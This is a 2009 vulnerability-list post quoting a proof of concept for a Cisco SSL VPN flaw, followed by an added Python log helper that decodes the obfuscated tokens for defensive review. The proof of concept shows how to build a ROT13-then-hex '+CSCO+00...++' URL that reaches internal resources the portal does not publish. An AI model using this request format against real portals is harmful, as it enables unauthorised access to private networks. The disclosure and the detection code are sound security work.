[VIM] it's 2009, vendors really think ROT13 is good?

security curmudgeon jericho at attrition.org
Fri Dec 18 04:23:46 UTC 2009


http://archives.neohapsis.com/archives/fulldisclosure/2009-12/0385.html

IV. PROOF OF CONCEPT
-------------------------
Using URL http://intranet published on internal server (not accessible
from home page):
1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL:
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++
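
Added example, not part of the original post or the quoted advisory: a log-review helper that reverses the two encoding steps above (hex, then ROT13) so the real destination behind each +CSCO+00...++ request becomes visible. The log line layout, the sample lines and the allowed_prefixes list are constructed assumptions for illustration.

```python
import codecs
import re

# Token layout as given in the quoted steps: "+CSCO+00" + hex(ROT13(url)) + "++"
TOKEN_RE = re.compile(r"\+CSCO\+00((?:[0-9a-fA-F]{2})+)\+\+")


def decode_token(hex_part):
    """Undo step 2 (hex -> ASCII) and step 1 (ROT13) to recover the URL."""
    try:
        rotated = bytes.fromhex(hex_part).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None  # not ASCII after hex decoding: skip, review by hand
    return codecs.decode(rotated, "rot_13")


def decoded_targets(log_lines, allowed_prefixes=()):
    """Return (line_no, decoded_url, allowed) for each token in the log.

    allowed_prefixes is a hypothetical list of destinations the portal is
    meant to publish; anything else is worth a closer look.
    """
    results = []
    for line_no, line in enumerate(log_lines, 1):
        for match in TOKEN_RE.finditer(line):
            url = decode_token(match.group(1))
            if url is None:
                continue
            allowed = any(url.lower().startswith(p) for p in allowed_prefixes)
            results.append((line_no, url, allowed))
    return results


# Constructed sample lines (format is an assumption, not real appliance output).
SAMPLE_LOG = [
    '10.0.0.5 alice "GET /+CSCO+00756767633a2f2f766167656e617267++ HTTP/1.1" 200',
    '10.0.0.6 bob "GET /+CSCO+00756767633a2f2f636265676e79++ HTTP/1.1" 200',
    '10.0.0.7 carol "GET /+CSCO+00ff++ HTTP/1.1" 404',
    '10.0.0.8 dave "GET /index.html HTTP/1.1" 200',
]

if __name__ == "__main__":
    for line_no, url, allowed in decoded_targets(SAMPLE_LOG, ("http://portal",)):
        print(line_no, url, "ok" if allowed else "NOT PUBLISHED")
```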

